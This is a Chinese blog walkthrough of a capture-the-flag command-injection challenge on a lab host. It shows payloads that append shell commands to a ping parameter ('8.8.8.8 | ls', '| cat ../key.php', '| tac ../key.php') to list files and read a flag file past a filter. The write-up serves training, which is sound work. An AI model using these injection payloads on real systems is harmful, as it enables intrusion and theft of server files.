题目4 命令执行(保姆级教程)

honest_gg2023-07-27 15:09

url:http://192.168.154.253:84/ #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过利用命令执行漏洞执行Linux命令获取webshell,最后从根目录下key.php文件中获得flag

2、开始答题

第一步:测试命令执行漏洞点

|---------------------------------------------------------------------------------------------------------------|
| 1、传参 8.8.8.8 |
| |

第二步:利用漏洞点拿到flag

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 猜测是执行了命令 ping 8.8.8.8 直接构建payload:ping 8.8.8.8 | ls 传参: 8.8.8.8 | ls |
| 应该是过滤了一些命令,换命令执行 执行语句: ping 8.8.8.8 | cat ../key.php 参数: 8.8.8.8 | cat ../key.php |
| 执行语句: ping 8.8.8.8 | tac ../key.php 参数: 8.8.8.8 | tac ../key.php |

相关推荐
jugt2 小时前
CentOS 7.9安装Nginx1.24.0时报 checking for LuaJIT 2.x ... not found
linux·运维·centos
Web极客码9 小时前
如何轻松、安全地管理密码(新手指南)
计算机网络·安全·web安全·网络安全
安全系统学习10 小时前
【网络安全】Qt免杀样本分析
java·网络·安全·web安全·系统安全
Bruce_Liuxiaowei11 小时前
文件上传漏洞深度解析:检测与绕过技术矩阵
安全·矩阵·文件上传漏洞
CYRUS STUDIO12 小时前
FART 脱壳某大厂 App + CodeItem 修复 dex + 反编译还原源码
android·安全·逆向·app加固·fart·脱壳
SilentCodeY13 小时前
Ubuntu 系统通过防火墙管控 Docker 容器
linux·安全·ubuntu·系统防火墙
keson要进步13 小时前
CICD实战(一) -----Jenkins的下载与安装
运维·ci/cd·centos·自动化·jenkins
海天胜景15 小时前
Delphi SetFileSecurity 设置安全描述符
安全
阿部多瑞 ABU15 小时前
# 从底层架构到应用实践:为何部分大模型在越狱攻击下失守?
gpt·安全·ai·自然语言处理
KKKlucifer15 小时前
从边界防护到内生安全:企业网络安全进化路线图
安全·web安全
热门推荐
01Coze扣子平台完整体验和实践(附国内和国际版对比)02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04神经网络架构KAN确实具有一些独特的特点及底层原理和应用场景05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07海康Visionmaster-常见问题排查方法-启动阶段08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10【无人机】无人机通信模块,无人机图数传模块的介绍,数传,图传,图传数传一体电台,